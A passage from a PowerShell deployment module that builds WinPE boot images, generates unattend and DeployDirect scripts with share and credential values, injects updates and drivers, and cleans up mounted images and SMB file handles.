$pxeServerName = $Env:COMPUTERNAME } if ($UsePxeServerRole) { # Take image content from the PXE server $hostImageDir = "\\$pxeServerName\Images" } else { # Install Image is generated. $hostImageDir = $ExecutionContext.InvokeCommand.ExpandString($physicalMachinesRole.PublicInfo.VhdImageTargetDir.Path) if ($UseVersionedWim) { $hostImageDir = Get-AzSVersionedPath -Path $hostImageDir } if ($hostImageDir -like "*{*}*") { $clusterName = Get-ManagementClusterName $Parameters $hostImageDir = Get-SharePath $Parameters $hostImageDir $clusterName } } Trace-Execution "Using host image folder $hostImageDir for DeployDirect script" if ([Environment]::GetEnvironmentVariable("OSImageType") -eq "ISO") { Trace-Execution "OSImageType is ISO" $hostImagePath = $hostImageDir + '\' + $physicalMachinesRole.PublicInfo.InstallImage.ISOName Trace-Execution "Using host ISO $hostImagePath for DeployDirect script" # Copy SetupComplete.cmd script needed for ISO-based OS deployments to RemoteUnattend folder $isoSetupCompleteScript = "C:\CloudDeployment\Roles\Common\SetupComplete_ISO.cmd" if (Test-Path -Path $isoSetupCompleteScript) { Trace-Execution "Copy '$($isoSetupCompleteScript)' to RemoteUnattend folder" $dest = "C:\RemoteUnattend\SetupComplete.cmd" if (-not(Test-Path -Path (Split-Path -Path $dest -Parent))) { $null = New-Item -ItemType File -Path $dest -Force } Copy-Item -Path $isoSetupCompleteScript -Destination $dest -Force $version = ([string]($Parameters.Roles["Cloud"].PublicConfiguration.PublicInfo.Version)).Trim() # Add line to SetupComplete.cmd to create file on the host when deployment has completed Add-Content -Path $dest -Value "echo $version > C:\CloudBuilderTemp\$($physicalMachinesRole.PublicInfo.DeploymentGuid).txt" } else { Trace-Execution "Could not find 'C:\CloudDeployment\Roles\Common\SetupComplete_ISO.cmd'" } } else { Trace-Execution "OSImageType is VHD" if ($physicalMachinesRole.PublicInfo.InstallImage.Index) { $hostImagePath = $hostImageDir + '\' + $physicalMachinesRole.PublicInfo.InstallImage.VHDName } else { # Use the initial Image. $hostImagePath = $ExecutionContext.InvokeCommand.ExpandString($physicalMachinesRole.PublicInfo.InstallImage.Path) } Trace-Execution "Using host VHD $hostImagePath for DeployDirect script" } # This VHD should be unused $winPEVHDImagePath = $hostImageDir + '\' + $physicalMachinesRole.PublicInfo.BootImage.VHDName $deployScriptContent = Get-Content $DeployDirectPath $deployScriptContent = $deployScriptContent.Replace('[DeploymentGuid]', $physicalMachinesRole.PublicInfo.DeploymentGuid) $deployScriptContent = $deployScriptContent.Replace('[DVMIPAddress]', $pxeIPAddress) $deployScriptContent = $deployScriptContent.Replace('[DVMName]', $pxeServerName) $deployScriptContent = $deployScriptContent.Replace('[HostImagePath]',$hostImagePath) $deployScriptContent = $deployScriptContent.Replace('[WinPEVHDImagePath]', $winPEVHDImagePath) if ($UsePxeServerRole) { # On the PXE server C:\RemoteUnattend must be accessed as \\PXE\RemoteUnattend $deployScriptContent = $deployScriptContent.Replace('[RemoteUnattendShare]', "RemoteUnattend") } else { # Local administrator credentials are used on the DVM, so the C$ share is available $deployScriptContent = $deployScriptContent.Replace('[RemoteUnattendShare]', "C$\RemoteUnattend") } if (-not $hostImagePath.StartsWith('\\')) { # Used to create a host entry in WinPE. $deployScriptContent = $deployScriptContent.Replace('[HostShareIPAddress]', $pxeIPAddress) $deployScriptContent = $deployScriptContent.Replace('[HostShareName]', $pxeServerName) } else { # Get the IP and Hostname from the share. $shareComputerName = $hostImagePath.Substring(2).Split('\')[0] $shareIPv4 = Resolve-DnsName $shareComputerName | Where-Object QueryType -eq 'A' $ip = $null foreach ($shareIp in $shareIPv4.IPAddress) { $succcess = Test-Connection $shareIp -ErrorAction SilentlyContinue -ErrorVariable connectionError if ($succcess) { $ip = $shareIp break } else { Trace-Warning "Share endpoint failed with: $connectionError" } } Trace-Execution "Resolved: '$shareComputerName' to IP: '$ip'" # Used to create a host entry in WinPE $deployScriptContent = $deployScriptContent.Replace('[HostShareIPAddress]', $ip) $deployScriptContent = $deployScriptContent.Replace('[HostShareName]',$shareComputerName) } $user = Get-UsernameAndPassword -Credential $PXEAccountCredential Trace-Execution "Using the account '$($user[0])' for DVM share." $deployScriptContent = $deployScriptContent.Replace('[DVMUser]', $user[0]) $deployScriptContent = $deployScriptContent.Replace('[DVMPassword]', $user[1]) $deployScriptContent = $deployScriptContent.Replace('[HypervisorSchedulerType]', $HypervisorSchedulerType) if ($VHDShareAccountCredential) { $user = Get-UsernameAndPassword -Credential $vhdShareAccountCredential Trace-Execution "Using the account '$($user[0])' for host VHD share." $deployScriptContent = $deployScriptContent.Replace('[VHDSharePathUser]', $user[0]) $deployScriptContent = $deployScriptContent.Replace('[VHDSharePathPassword]',$user[1]) } else { Trace-Execution "Not setting host VHD share credentials." } $networkDefinition = Get-NetworkDefinitions -Parameters $Parameters $networks = $networkDefinition.Networks.Network $hostNicNetworkName = Get-NetworkNameForCluster -ClusterName "s-cluster" -NetworkName "HostNIC" foreach ($network in $networks) { if ($network.Name -eq $hostNicNetworkName) { $deployScriptContent = $deployScriptContent.Replace('[HostNetworkBeginAddress]', $network.IPv4.StartAddress) $deployScriptContent = $deployScriptContent.Replace('[HostNetworkEndAddress]', $network.IPv4.EndAddress) } } $deployScriptContent = $deployScriptContent.Replace('[RebootOnComplete]', '$true') if ($UsePxeServerRole) { $deployScriptContent = $deployScriptContent.Replace('[ClearExistingStorage]', '$false') } else { $deployScriptContent = $deployScriptContent.Replace('[ClearExistingStorage]', '$true') } $newDeployDirectPath = "$PSScriptRoot\DeployDirectReplaced.ps1" Set-Content -Value $deployScriptContent -Path $newDeployDirectPath -Force return $newDeployDirectPath } function Test-SkipDriverInjection { [CmdletBinding()] param ( [Parameter(Mandatory = $true)] [bool] $SkipDriverInjection ) $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop $driverPath = "$env:SystemDrive\CloudDeployment\Drivers" if ($skipDriverInjection) { Trace-Warning 'Driver injection will be skipped as instructed by $CloudBuilder.SkipDriverInjection setting.' } elseif (-not (Test-Path $driverPath)) { Trace-Execution "Driver injection will be skipped as the driver path '$driverPath' does not exist." $skipDriverInjection = $true } elseif (-not (Get-ChildItem $driverPath)) { Trace-Execution "Driver injection will be skipped as the driver path '$driverPath' does not contain any files." $skipDriverInjection = $true } elseif (-not (Get-ChildItem $driverPath -Filter *.inf -Recurse)) { Trace-Execution "Driver injection will be skipped as the driver path '$driverPath' does not contain any drivers (no *.inf files found)." $skipDriverInjection = $true } return $skipDriverInjection } function New-PxeUnattendFile { [CmdletBinding()] param ( [Parameter(Mandatory=$true)] [String] $ComputerName, [Parameter(Mandatory=$false)] [String] $SLPKey, [Parameter(Mandatory=$true)] [string] $MachineIdentifier, [Parameter(Mandatory=$true)] [PSCredential] $LocalAdministratorCredential, [Parameter(Mandatory=$false)] [String] $DomainJoinBlob, [Parameter(Mandatory=$false)] [String] $DomainFqdn, [Parameter(Mandatory=$false)] [PSCredential] $DomainAdminCredential, [Parameter(Mandatory=$false)] [PSCredential] $LocalAccountCredential, [Parameter(Mandatory=$false)] [PSCredential] $LocalCloudAdminCredential, [Parameter(Mandatory=$false)] [String] $DefenderUpdatesPath, [Parameter(Mandatory=$true)] [String] $UnattendFilePath, [Parameter(Mandatory=$true)] [String] $OutputPath ) $outputGuid = [Guid]::NewGuid(); if (-not [Guid]::TryParse($MachineIdentifier, [ref] $outputGuid)) { # $OFS which is a special variable in powershell . OFS stands for Output field separator . $ofs = '-' $MacAddressString = "$(([System.Net.NetworkInformation.PhysicalAddress]$MachineIdentifier).GetAddressBytes() | ForEach-Object {'{0:X2}' -f $_})" $MachineIdentifier = $MacAddressString } $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop $unattendContent = (Get-Content $UnattendFilePath) $unattendContent = $unattendContent.Replace('[ComputerName]', $ComputerName) # Commented out code is not needed for AsZ reset # Clean up later to have AsZ specific method #if ($DefenderUpdatesPath) { # $unattendContent = $unattendContent.Replace('[FileSharesSources]', $DefenderUpdatesPath) #} #if ($SLPKey) { # $unattendContent = $unattendContent.Replace('[SLPKey]', $SLPKey) #} #else { # $unattendContent = $unattendContent -replace '<ProductKey>.*</ProductKey>', '' #} $unattendContent = $unattendContent.Replace('[LocalAdministratorPassword]', [System.Security.SecurityElement]::Escape(([Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($LocalAdministratorCredential.Password))))) #$unattendContent = $unattendContent.Replace('[LocalAdministratorName]', $LocalAdministratorCredential.UserName) # Multi-node tokens #$unattendContent = $unattendContent.Replace('[DomainJoinBlob]', $DomainJoinBlob) #$unattendContent = $unattendContent.Replace('[DomainFqdn]', $DomainFqdn) #if ($DomainAdminCredential) { # $unattendContent = $unattendContent.Replace('[DomainAdminUsername]', $DomainAdminCredential.UserName) # $unattendContent = $unattendContent.Replace('[DomainAdminPassword]', [System.Security.SecurityElement]::Escape(([Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($DomainAdminCredential.Password))))) #} #if ($LocalAccountCredential) { # $unattendContent = $unattendContent.Replace('[LocalAccountUsername]', $LocalAccountCredential.UserName) # $unattendContent = $unattendContent.Replace('[LocalAccountPassword]', [System.Security.SecurityElement]::Escape(([Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($LocalAccountCredential.Password))))) #} #if ($LocalCloudAdminCredential) { # $unattendContent = $unattendContent.Replace('[LocalCloudAdminUsername]', $LocalCloudAdminCredential.UserName) # $unattendContent = $unattendContent.Replace('[LocalCloudAdminPassword]', [System.Security.SecurityElement]::Escape(([Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($LocalCloudAdminCredential.Password))))) #} $unattendFilePath = "$OutputPath\$MachineIdentifier.xml" if (Test-Path $unattendFilePath) { Remove-Item $unattendFilePath -Force } Set-Content -Value $unattendContent -Path "$OutputPath\$MachineIdentifier.xml" -Force } function New-WinPEImage { [CmdletBinding()] param ( [Parameter(Mandatory=$true)] [String] $DeployDirectPath, [Parameter(Mandatory=$false)] [bool] $UseVersionedWim = $true, [Parameter(Mandatory=$false)] [PSCredential] $PXEAccountCredential, [Parameter(Mandatory=$false)] [PSCredential] $VHDShareAccountCredential, [Parameter(Mandatory=$true)] [CloudEngine.Configurations.EceInterfaceParameters] $Parameters, [Switch]$PostDeployment ) $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop $physicalMachinesRole = $Parameters.Roles["BareMetal"].PublicConfiguration $physicalMachinesRolePrivateInfo = $Parameters.Configuration.Role.PrivateInfo $cloudRole = $Parameters.Roles["Cloud"].PublicConfiguration $OEMRole = $Parameters.Roles["OEM"].PublicConfiguration $OEMModel = $OEMRole.PublicInfo.UpdatePackageManifest.UpdateInfo.Model $clusterName = Get-ManagementClusterName $Parameters $winPEBootImage = $physicalMachinesRole.PublicInfo.BootImage if ($PostDeployment.IsPresent) { $UsePxeServerRole = $true $bootImageSrcDir = $physicalMachinesRolePrivateInfo.LibraryShareImageFolder.Path } else { $UsePxeServerRole = $false $bootImageSrcDir = $ExecutionContext.InvokeCommand.ExpandString($winPEBootImage.SrcDir) } if ($bootImageSrcDir -like "*{*}*") { $bootImageSrcDir = Get-SharePath $Parameters $bootImageSrcDir $clusterName } # Use versioned path if specified if ($UseVersionedWim) { $bootImageSrcDir = Get-AzSVersionedPath -Path $bootImageSrcDir } $bootImagePath = Join-Path $bootImageSrcDir $winPEBootImage.BaseImage $bootImageIndex = $winPEBootImage.Index $vhdTargetDirPath = $ExecutionContext.InvokeCommand.ExpandString($physicalMachinesRole.PublicInfo.VhdImageTargetDir.Path) if ($vhdTargetDirPath -like "*{*}*") { $vhdTargetDirPath = Get-SharePath $Parameters $vhdTargetDirPath $clusterName } # Use versioned path if specified if ($UseVersionedWim) { $vhdTargetDirPath = Get-AzSVersionedPath -Path $vhdTargetDirPath } $winpeVhdImagePath = Join-Path $vhdTargetDirPath -ChildPath $winPEBootImage.VHDName $mountPath = Join-Path -Path ([IO.Path]::GetTempPath()) -ChildPath ([Guid]::NewGuid()) if ($PostDeployment.IsPresent) { $wimStagingPath = Join-Path -Path ([IO.Path]::GetTempPath()) -ChildPath ([Guid]::NewGuid()) $GenerateWim = $true $GenerateVhd = $false } else { $wimStagingPath = $bootImageSrcDir $skipCopy = $true $Script:IsIdempotentRun = [Bool]::Parse($physicalMachinesRolePrivateInfo.ExecutionContext.IdempotentRun) $GenerateWim = ((-not $Script:IsIdempotentRun) -or (-not (Test-Path $winpeVhdImagePath))) $GenerateVhd = $GenerateWim } if ($GenerateWim) { # Attempt to start defender if not already running $service = Get-Service -Name "windefend" -ErrorAction SilentlyContinue if ($null -ne $service -and $service.Status -ine "Running") { $service | Start-Service -ErrorAction SilentlyContinue | Out-Null } # On virtual environments to avoid infra VM reboots change hypervisor scheduler type to Classic. # On physical enviornments the scheduler type will be Core if ($OEMModel -notmatch "Hyper-V") { $hypervisorSchedulerType = "Core" } else { $hypervisorSchedulerType = "Classic" } try { $newDeployDirectPath = New-DeployDirect ` -DeployDirectPath $deployDirectPath ` -PXEAccountCredential $PXEAccountCredential ` -VHDShareAccountCredential $VHDShareAccountCredential ` -UsePxeServerRole $UsePxeServerRole ` -Parameters $Parameters ` -UseVersionedWim $UseVersionedWim ` -HypervisorSchedulerType $hypervisorSchedulerType Dismount-AllMountedImages if (-not (Test-Path $mountPath)) { $null = New-Item -Path $mountPath -ItemType Directory } if (-not (Test-Path $wimStagingPath)) { $null = New-Item -Path $wimStagingPath -ItemType Directory } # set exclusion path when windefend is running if ($null -ne $service -and $service.Status -eq "Running") { Trace-Execution "Exclude mount folders $mountPath and $wimStagingPath from Windows Defender scan to speed up configuration." Add-MpPreference -ExclusionPath $mountPath, $wimStagingPath -ErrorAction SilentlyContinue } Trace-Execution "Copying required content from '$bootImageSrcDir' to '$wimStagingPath'." if (-not $skipCopy) { $out = Robocopy.exe $bootImageSrcDir $wimStagingPath $physicalMachinesRole.PublicInfo.BootImage.BaseImage /R:2 /W:10 # Check for exit code. If exit code is greater than 7, it means an error occured while peforming a copy operation. if ($LASTEXITCODE -ge 8) { $message = "There were errors copying files from '$bootImageSrcDir' to '$wimStagingPath'. Robocopy exit code $LASTEXITCODE.`n" $message += ($out | Out-String) throw $message } } $wimStagingFile = Join-Path $wimStagingPath $physicalMachinesRole.PublicInfo.BootImage.BaseImage Trace-Execution "Mount '$wimStagingFile' to '$mountPath'." Mount-WindowsImageWithRetry -ImagePath $wimStagingFile -Path $mountPath -Index $bootImageIndex Copy-Item "$newDeployDirectPath" "$mountPath\DeployDirect.ps1" -Recurse -Force Copy-Item "$PSScriptRoot\..\Common\DeployDirectCommon.psm1" "$mountPath\DeployDirectCommon.psm1" -Recurse -Force Copy-Item "$PSScriptRoot\..\Common\startnet.cmd" "$mountPath\Windows\System32\startnet.cmd" -Recurse -Force Trace-Execution "Dismount and save mounted image." Dismount-WindowsImage -Path $mountPath -Save -Verbose:$false if (-not $skipCopy) { Trace-Execution "Copying updated boot image '$wimStagingFile' back to '$bootImageSrcDir'." $out = Robocopy.exe $wimStagingPath $bootImageSrcDir $physicalMachinesRole.PublicInfo.BootImage.BaseImage /R:2 /W:10 # Check for exit code. If exit code is greater than 7, it means an error occured while performing a copy operation. if ($LASTEXITCODE -ge 8) { $message = "There were errors copying files from '$wimStagingPath' to '$bootImageSrcDir'. Robocopy exit code $LASTEXITCODE.`n" $message += ($out | Out-String) throw $message } Remove-Item -Path $wimStagingFile -Force -Confirm:$false -ErrorAction Ignore } } finally { Dismount-AllMountedImages if ($null -ne $service -and $service.Status -eq "Running") { Trace-Execution "Remove Windows Defender exclusions for paths $MountPath and $wimStagingPath" Remove-MpPreference -ExclusionPath $MountPath, $wimStagingPath -ErrorAction SilentlyContinue } } if ($GenerateVhd) { Trace-Execution "Converting WIM image '$bootImagePath' to VHDBoot image '$winpeVhdImagePath'." $newVhdFromWimParameters = @{ WimPath = $BootImagePath VhdPath = $winpeVhdImagePath WimImageIndex = $BootImageIndex SizeBytes = 120GB VhdBoot = $true } New-VhdFromWim @newVhdFromWimParameters -Force -Verbose } } } <# Mounts the Wim file and injects desired content into it #> function Update-BootWimFile { [CmdletBinding()] param ( [Parameter(Mandatory=$true)] [CloudEngine.Configurations.EceInterfaceParameters] $Parameters, [Parameter(Mandatory=$false)] [bool] $UseVersionedWim = $true ) $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop $cloudRole = $Parameters.Roles["Cloud"].PublicConfiguration Trace-Execution "Update boot.wim file" $physicalMachinesRole = $Parameters.Roles["BareMetal"].PublicConfiguration $virtualMachinesRole = $Parameters.Roles["VirtualMachines"].PublicConfiguration $clusterName = Get-ManagementClusterName $Parameters # Windows Update staging folder $windowsUpdateStagingFolder = $physicalMachinesRole.PublicInfo.WindowsUpdateStagingFolder.Path if ($windowsUpdateStagingFolder -like "*{*}*") { $windowsUpdateStagingFolder = Get-SharePath $Parameters $windowsUpdateStagingFolder $clusterName } else { $windowsUpdateStagingFolder = $ExecutionContext.InvokeCommand.ExpandString($windowsUpdateStagingFolder) } # Boot image $winPEBootImage = $physicalMachinesRole.PublicInfo.BootImage $bootImageSrcDir = $ExecutionContext.InvokeCommand.ExpandString($winPEBootImage.SrcDir) if ($bootImageSrcDir -like "*{*}*") { $bootImageSrcDir = Get-SharePath $Parameters $bootImageSrcDir $clusterName } if ($UseVersionedWim) { $bootImagePath = Join-Path -Path (Get-AzSVersionedPath -Path $bootImageSrcDir) -ChildPath $winPEBootImage.BaseImage } else { $bootImagePath = Join-Path $bootImageSrcDir $winPEBootImage.BaseImage } $bootImageIndex = $winPEBootImage.Index if (Test-Path -Path $bootImagePath) { # Get rid of any half-built previous WIM. Clear-ImageMount -Path $bootImagePath -AlternateFileServerName $clusterName } # Mount the WIM file $mountedImage = [MountedImage]::new($bootImagePath, $bootImageIndex) # Get the image build and associated drivers path $windowsBuild = $mountedImage.GetBuild() $driverPath = Get-OEMDriverPath -Parameter $Parameters -Build $windowsBuild # Update the WIM file try { # Whenever Build runs on a seed ring node, there is very limited disk space. # Use a scratch drive for applying KBs. [string[]] $seedRingNodeNames = $Parameters.Roles["SeedRing"].PublicConfiguration.Nodes.Node | ForEach-Object Name if ($seedRingNodeNames -icontains $env:COMPUTERNAME) { Import-Module -Name "$PSScriptRoot\..\..\Roles\Common\Servicing\Scripts\Modules\HostTempDrive.psm1" $physicalHostName = Get-NodeRefNodeId $Parameters -RoleName "VirtualMachines" -NodeName $env:COMPUTERNAME $drive = New-ScratchDiskForNonHAVM -ComputerName $env:COMPUTERNAME -HyperVHosts @($physicalHostName) try { Trace-Execution "Running UpdateImageWithWindowsUpdates on a seed ring, using update scratch directory." # Inject Windows updates # TEMP: Ignore applicability check for packages when adding them to WinPE image. $mountedImage.UpdateImageWithWindowsUpdates($windowsUpdateStagingFolder, "$drive`:\UpdateTemp", $true) } finally { Remove-ScratchDiskForNonHAVM -ComputerName $env:COMPUTERNAME -HyperVHosts @($physicalHostName) } } else { # Inject Windows updates Trace-Execution "Injecting updates from non-seedring orchestrator." $mountedImage.UpdateImageWithWindowsUpdates($windowsUpdateStagingFolder) } # Inject drivers $skipDriverInjection = [Bool]::Parse($physicalMachinesRole.PublicInfo.SkipDriverInjection) $mountedImage.AddDriversToImage($driverPath, $skipDriverInjection) # Inject deployment content if ($Parameters.Configuration.Role.PrivateInfo.DeploymentContent) { $libraryShareNugetStorePath = Get-SharePath $Parameters $virtualMachinesRole.PublicInfo.LibraryShareNugetStoreFolder.Path $clusterName if (Test-Path -Path $libraryShareNugetStorePath) { $mountedImage.ExpandDeploymentArtifacts($Parameters.Configuration.Role.PrivateInfo.DeploymentContent, $libraryShareNugetStorePath) } else { $mountedImage.ExpandDeploymentArtifacts($Parameters.Configuration.Role.PrivateInfo.DeploymentContent) } } if ($UseVersionedWim) { # Get current or UpdateVersion in case of update $updateVersion = Get-InProgressUpdateVersion -Parameters $Parameters if ($null -ne $updateVersion) { $version = $updateVersion } else { $version = ([string]($cloudRole.PublicInfo.Version)).Trim() } $mountedImage.UpdateImageStatusFile($version, "BuildCompleted") } } finally { $mountedImage.Dispose() } } <# .SYNOPSIS Dismounts all the mounted images .DESCRIPTION Dismounts all the mounted images #> function Dismount-AllMountedImages { Import-Module Dism Clear-WindowsCorruptMountPoint $mountedImages = Get-WindowsImage -Mounted -Verbose:$false if ($mountedImages) { Trace-Execution "Found the following mounted images:`r`n$($mountedImages | Out-String)" Trace-Execution "Discard previously mounted images." $null = $mountedImages | ForEach-Object { $mountPath = $_.MountPath try { Trace-Execution "Unmounting '$mountPath'" Dismount-WindowsImage -Path $mountPath -Discard -Verbose:$false } catch { # It is possible we may have hit mount point invalid mount point state due to ECE failover # so applying remediation and retrying. See VSO 8588300 for more details. Trace-Execution "Failed to unmount '$mountPath' so unloading mounted keys and retrying" $mountPathKey = $mountPath.Replace('\','/') $(reg query HKLM) | ForEach-Object { if ($_ -like "*$mountPathKey*") { reg unload $_ } } Dismount-WindowsImage -Path $mountPath -Discard -Verbose:$false } } } # If the mounted image was undergoing a DISM operation while ECE service was failed over or crashed, # it's possible that the image is still mounted. We can look for any such disks mounted from the SU1FileServer # and clean them up. $mountedDisks = Get-Disk | Where-Object Location -match "SU1FileServer" if ($mountedDisks) { Trace-Execution "Found the following mounted disks:`r`n$($mountedDisks | Format-List Number, FriendlyName, Size, Location)" foreach ($disk in $mountedDisks) { Dismount-VHD -DiskNumber $disk.Number } } Import-Module Storage Get-Volume | Where-Object FileSystemLabel -eq 'Deployment' | ForEach-Object { Get-DiskImage -DevicePath $_.Path.TrimEnd('\') } | Dismount-DiskImage } <# .SYNOPSIS Copy base images into the verioned folder .DESCRIPTION Creates copies of the base images in the versioned folder. #> function New-VersionedImages { [CmdletBinding()] param ( [string] $InProgressImageFolder, [string] $BaseImageFolder, [string[]] $Images ) $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop # If the build folder exists, delete it and start again if (Test-Path $InProgressImageFolder) { Trace-Execution "Clean up old content as build did not complete during previous run." Remove-Item -Path $InProgressImageFolder -Recurse -Force } Trace-Execution "Creating build folder $InProgressImageFolder" $null = New-Item -Path $InProgressImageFolder -ItemType Directory -Force # Loop through all name of all the images needed foreach ($imageName in $Images) { $newImagePath = Join-Path -Path $InProgressImageFolder -ChildPath $imageName if (Test-Path $newImagePath) { Trace-Execution "The new image: $newImagePath already exists. Skipping creation of this image" } else { $sourceImagePath = Join-Path -Path $BaseImageFolder -ChildPath $imageName if (-not(Test-Path -Path $sourceImagePath)) { $sourceImagePath = Join-Path -Path 'C:\CustomArtifacts\Core\Image' -ChildPath $imageName if (-not(Test-Path -Path $sourceImagePath)) { throw "Unable to find '$($imageName)' in any known source image path." } } Trace-Execution "Copying source image at '$sourceImagePath' to destination image path '$newImagePath'." Copy-FileAtomic -SourceFilePath $sourceImagePath -DestinationFilePath $newImagePath -Verbose -ErrorAction Stop } } } <# .SYNOPSIS Get names of the images needed for deployment and updates .DESCRIPTION Creates copies of the base images in the versioned folder. .PARAMETER Parameters The EceInterfaceParameters object which is populated by ECE #> function Get-SourceImageNames { [CmdletBinding()] param ( [Parameter(Mandatory=$true)] [CloudEngine.Configurations.EceInterfaceParameters] $Parameters, [switch] $SkipWim, [switch] $SkipArtifacts ) $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop $images = @() # Roles $physicalMachinesRole = $Parameters.Roles["BareMetal"].PublicConfiguration $virtualMachinesRole = $Parameters.Roles["VirtualMachines"].PublicConfiguration if ($SkipWim.IsPresent -eq $false) { # Image to be used for host # Boot Image (boot.wim) $bootImageName = $physicalMachinesRole.PublicInfo.BootImage.BaseImage if ($bootImageName) { $images += $bootImageName } } # Image to be used for host OS. $hostOSImageName = $physicalMachinesRole.PublicInfo.InstallImage.BaseImage if ($hostOSImageName -and $images -notcontains $hostOSImageName) { $images += $hostOSImageName } if (($SkipWim.IsPresent -eq $false) -and ([Environment]::GetEnvironmentVariable("OSImageType") -eq "ISO")) { $images += $physicalMachinesRole.PublicInfo.InstallImage.ISOName } # Identify names of the VHDs to be copied, update the base images to be used for the guest VMs $guestVMs = $virtualMachinesRole.Nodes.Node foreach ($vm in $guestVMs) { $osImageName = $vm.Vhds.Vhd | Where-Object Index -eq 0 | ForEach-Object Path if ($images -notcontains $osImageName) { # Add it to the array to avoid configuration of the same image multiple times $images += $osImageName } # Add Artifacts VHD to list of required images if specified in any VM role definition. $artifactsVhdName = $vm.Vhds.Vhd | Where-Object Path -eq "Artifacts.vhdx" | ForEach-Object Path if (![string]::IsNullOrEmpty($artifactsVhdName)) { Trace-Execution "Artifacts VHD '$artifactsVhdName' is requested by role definition of VM '$($vm.Name)'." Trace-Execution "SkipArtifacts switch is '$SkipArtifacts'." Trace-Execution "Current image list: '$images'." if (!$SkipArtifacts.IsPresent -and $images -notcontains $artifactsVhdName) { Trace-Execution "Add Artifacts VHD '$artifactsVhdName' to list of images required for deployment or update." $images += $artifactsVhdName Trace-Execution "Updated image list: '$images'." } } } $images = $images | where {$_ -inotmatch 'WindowsServerCore.vhdx'} return $images } # This function clears the mounted image. function Clear-ImageMount { param ( # This will be \\XXXX\XXVM_temp*.vhdx [Parameter(Mandatory=$true)] [Alias("UncPath")] [string] $Path, [switch] $DeleteImage, # If the path is on the file server this script will attempt to close any open SMB handles. # Doing so requires a PS session to the file server. However the file server name (SU1FileServer) can resolve # to changing IPs, which can break the underlying WinRM session. As a workaround, an alternate target server name # can be provided by the caller (typically the cluster name), which always resolves to the same IP address. [string] $AlternateFileServerName ) $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop # Check if file or its dism mount exists. if (-not (Test-Path $Path*)) { Trace-Execution "The specified image '$Path' does not exist, no cleanup is necessary." return } if (Get-WindowsImage -Mounted | Where-Object MountStatus -eq 'Invalid') { Trace-Execution "Clear corrupt WindowsImage/DISM mount points." $null = Clear-WindowsCorruptMountPoint -Verbose:$False } Get-Disk | Where-Object Location -like $Path | ForEach-Object { Trace-Execution "Dismount image mounted by Mount-DiskImage on the local host." Dismount-DiskImage -ImagePath $_.Location -Confirm:$false } if ((Get-ChildItem "$Path.dism*" -Force) -or ((Get-ChildItem -Path $Path).Extension -eq '.wim')) { Trace-Execution "The file appears to be mounted by Mount-WindowsImage command, attempting to dismount it gracefully." Get-WindowsImage -Mounted -Verbose:$False | Where-Object ImagePath -like $Path | ForEach-Object { if ($_.MountStatus -eq 'NeedsRemount') { $null = New-Item -Path $_.Path -ItemType Directory -Force Mount-WindowsImage -Path $_.Path -Remount -Verbose:$False } $null = Dismount-WindowsImage -Path $_.Path -Discard -Verbose:$False } } # Check if path points to a network share. $uri = [System.Uri]$Path if ($uri.IsUnc) { $serverName = $uri.Host # WinNextWorkaround: do not use SU1FileServer as the target name for remote sessions. Use the cluster name instead. if ($serverName -eq "SU1FileServer" -and $AlternateFileServerName) { Trace-Execution "WinNextWorkaround: Known issues with creating remote sessions to SU1FileServer. Connecting to $AlternateFileServerName instead." $serverName = $AlternateFileServerName } $sharePath = [System.IO.Path]::GetPathRoot($Path) $shareRelativePath = $Path.Replace($sharePath, '').TrimStart('\') Trace-Execution "Establish remote connection to file server '$serverName' to remove potential locks on the file '$Path'." Invoke-Command $serverName { $verbose = $using:VerbosePreference -eq [System.Management.Automation.ActionPreference]::Continue Trace-Execution "Get SMB file handles to '$using:shareRelativePath'." -Verbose:$verbose $smbOpenFiles = Get-SmbOpenFile | Where-Object ShareRelativePath -like "$using:shareRelativePath*" if ($smbOpenFiles) { Trace-Execution "Remove SMB file handles to $($smbOpenFiles.ShareRelativePath -join ', ')." -Verbose:$verbose $smbOpenFiles | Close-SmbOpenFile -Force -Verbose:$verbose } } } # If the mounted image was undergoing a DISM operation it's possible that the image is still mounted. # We can look for any such disks mounted from the SU1FileServer and clean them up. $mountedDisks = $null try { $mountedDisks = Get-Disk | Where-Object Location -match $Path } catch { Trace-Execution "Failed to get disk using location match. '$_' . Trying exact match." try { $mountedDisks = Get-Disk | Where-Object Location -eq $Path } catch { Trace-Execution "Failed to get disk using exact match. '$_'." } } try { if ($mountedDisks) { Trace-Execution "Found the following mounted disks:`r`n$($mountedDisks | Format-List Number, FriendlyName, Size, Location | Out-String)" foreach ($disk in $mountedDisks) { Dismount-VHD -DiskNumber $disk.Number } } } catch { Trace-Execution "Best-effort error during dismount share disks: $_" } if (Get-ChildItem "$Path.dism*" -Force) { Trace-Execution "Failed to dismount image gracefully, attempting to forcefully remove the file." $dismFilePath = Get-ChildItem "$Path.dism*" -Force Trace-Execution "Remove '$dismFilePath'." $dismFilePath | Remove-Item -Force } if ($DeleteImage -and (Test-Path $Path)) { Trace-Execution "Delete image '$Path'." Remove-Item -Path $Path -Force } } Export-ModuleMember -Function Add-AccountAcls Export-ModuleMember -Function Add-AccountMemberships Export-ModuleMember -Function Add-AllVIPs Export-ModuleMember -Function Add-DnsExternalPtrRecords Export-ModuleMember -Function Add-DnsRecord Export-ModuleMember -Function Add-DnsServerResourceRecordCNameRemoteOrLocal Export-ModuleMember -Function Add-DnsServerResourceRecordRemoteOrLocal Export-ModuleMember -Function Add-GroupMembership Export-ModuleMember -Function Add-GuestCluster Export-ModuleMember -Function Add-IDnsConfiguration Export-ModuleMember -Function Add-IPAddress Export-ModuleMember -Function Add-LoadBalancerToNetworkAdapter Export-ModuleMember -Function Add-LocalAdministrators Export-ModuleMember -Function Add-MachineMembership Export-ModuleMember -Function Add-NetworkAdapterToNetwork Export-ModuleMember -Function Add-ServiceAccountMembership Export-ModuleMember -Function Add-ServiceAccountSpn Export-ModuleMember -Function Add-UserMembership Export-ModuleMember -Function Assert-Service 